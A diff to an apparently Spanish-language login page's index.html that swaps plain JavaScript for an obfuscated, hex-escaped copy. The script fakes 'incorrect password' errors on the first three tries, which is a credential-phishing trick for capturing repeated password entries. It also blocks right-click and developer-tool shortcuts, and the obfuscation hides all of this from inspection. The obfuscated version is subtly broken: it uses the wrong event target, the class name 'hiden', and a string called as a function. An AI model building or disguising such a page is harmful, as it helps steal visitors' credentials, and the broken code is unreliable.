--- a/index.html
+++ b/index.html
@@ -76,47 +76,39 @@
     </form>
   </div>
 
-  <!-- Script -->
+  <!-- Script OFUSCADO -->
   <script>
-    let intentoNombre = 0;
-
-    // Paso de correo → contraseña
-    document.getElementById("btnNext1").addEventListener("click", function() {
-      const correo = document.getElementById("correo").value.trim();
-      if (correo === "") {
-        alert("Por favor ingresa tu correo");
-        return;
-      }
-      document.getElementById("step1").classList.add("hidden");
-      document.getElementById("step2").classList.remove("hidden");
+  (function(){
+    var _0x1a2b=["\x63\x6C\x69\x63\x6B","\x61\x64\x64","\x68\x69\x64\x64\x65\x6E","\x63\x6C\x61\x73\x73\x4C\x69\x73\x74","\x76\x61\x6C\x75\x65","\x74\x72\x69\x6D","\x63\x6F\x72\x72\x65\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x73\x74\x65\x70\x31","\x73\x74\x65\x70\x32","\x68\x69\x64\x65\x6E","\x63\x6C\x61\x73\x73\x4C\x69\x73\x74","\x72\x65\x6D\x6F\x76\x65","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x62\x74\x6E\x4E\x65\x78\x74\x31","\x74\x72\x69\x6D","\x61\x6C\x65\x72\x74","\x70\x6C\x65\x61\x73\x65\x20\x69\x6E\x67\x72\x65\x73\x61\x20\x74\x75\x20\x63\x6F\x72\x72\x65\x6F","\x6E\x6F\x6D\x62\x72\x65","\x65\x72\x72\x6F\x72\x4E\x6F\x6D\x62\x72\x65","\x69\x6E\x74\x65\x6E\x74\x6F\x4E\x6F\x6D\x62\x72\x65","\x63\x6F\x6E\x74\x61\x63\x74\x46\x6F\x72\x6D","\x73\x75\x62\x6D\x69\x74","\x62\x6F\x72\x64\x65\x72\x2D\x72\x65\x64\x2D\x35\x30\x30","\x74\x65\x78\x74\x43\x6F\x6E\x74\x65\x6E\x74","\x43\x6F\x6E\x74\x72\x61\x73\x65\xC3\xB1\x61\x20\x69\x6E\x63\x6F\x72\x72\x65\x63\x74\x61","\x70\x72\x65\x76\x65\x6E\x74\x44\x65\x66\x61\x75\x6C\x74","\x63\x6F\x6E\x74\x65\x78\x74\x6D\x65\x6E\x75","\x6F\x6E\x63\x6F\x6E\x74\x65\x78\x74\x6D\x65\x6E\x75","\x6B\x65\x79\x43\x6F\x64\x65","\x63\x74\x72\x6C\x4B\x65\x79","\x73\x68\x69\x66\x74\x4B\x65\x79","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74"];
+    var intento=0;
+    document[_0x1a2b[13]](_0x1a2b[14],function(){
+      var e=document[_0x1a2b[7]](_0x1a2b[6])[_0x1a2b[4]][_0x1a2b[5]]();
+      if(e===``){alert(_0x1a2b[17]);return;}
+      document[_0x1a2b[7]](_0x1a2b[8])[_0x1a2b[3]][_0x1a2b[1]](_0x1a2b[2]);
+      document[_0x1a2b[7]](_0x1a2b[9])[_0x1a2b[3]][_0x1a2b[12]](_0x1a2b[10]);
     });
-
-    // Validación contraseña
-    document.getElementById("contactForm").addEventListener("submit", function(e) {
-      const nombre = document.getElementById("nombre");
-      const errorMsg = document.getElementById("errorNombre");
-
-      intentoNombre++;
-
-      if (intentoNombre < 4) { 
-        errorMsg.classList.remove("hidden");
-        nombre.classList.add("border-red-500");
-        errorMsg.textContent = "Contraseña incorrecta";
-        e.preventDefault();
+    document[_0x1a2b[7]](_0x1a2b[21])[_0x1a2b[13]](_0x1a2b[22],function(ev){
+      var n=document[_0x1a2b[7]](_0x1a2b[18]);
+      var er=document[_0x1a2b[7]](_0x1a2b[19]);
+      intento++;
+      if(intento<4){
+        er[_0x1a2b[3]][_0x1a2b[12]](_0x1a2b[10]);
+        n[_0x1a2b[3]][_0x1a2b[1]](_0x1a2b[23]);
+        er[_0x1a2b[24]]=_0x1a2b[25];
+        ev.preventDefault();
       } else {
-        errorMsg.classList.add("hidden");
-        nombre.classList.remove("border-red-500");
+        er[_0x1a2b[3]][_0x1a2b[1]](_0x1a2b[10]);
+        n[_0x1a2b[3]][_0x1a2b[12]](_0x1a2b[23]);
       }
     });
-
-    // 🚫 Bloquear clic derecho e inspección
-    document.addEventListener("contextmenu", e => e.preventDefault()); 
-    document.onkeydown = function(e) {
-      if (e.keyCode == 123) return false; // F12
-      if (e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) return false; // Ctrl+Shift+I
-      if (e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) return false; // Ctrl+U
-      if (e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) return false; // Ctrl+Shift+J
+    document[_0x1a2b[13]](_0x1a2b[27],function(e){e[_0x1a2b[26]]();});
+    document[_0x1a2b[28]]=function(e){
+      if(e[_0x1a2b[29]]==123)return false;
+      if(e[_0x1a2b[30]]&&e[_0x1a2b[31]]&&e[_0x1a2b[29]]==_0x1a2b[32]("I"))return false;
+      if(e[_0x1a2b[30]]&&e[_0x1a2b[29]]==_0x1a2b[32]("U"))return false;
+      if(e[_0x1a2b[30]]&&e[_0x1a2b[31]]&&e[_0x1a2b[29]]==_0x1a2b[32]("J"))return false;
     };
+  })();
   </script>
 
 </body>
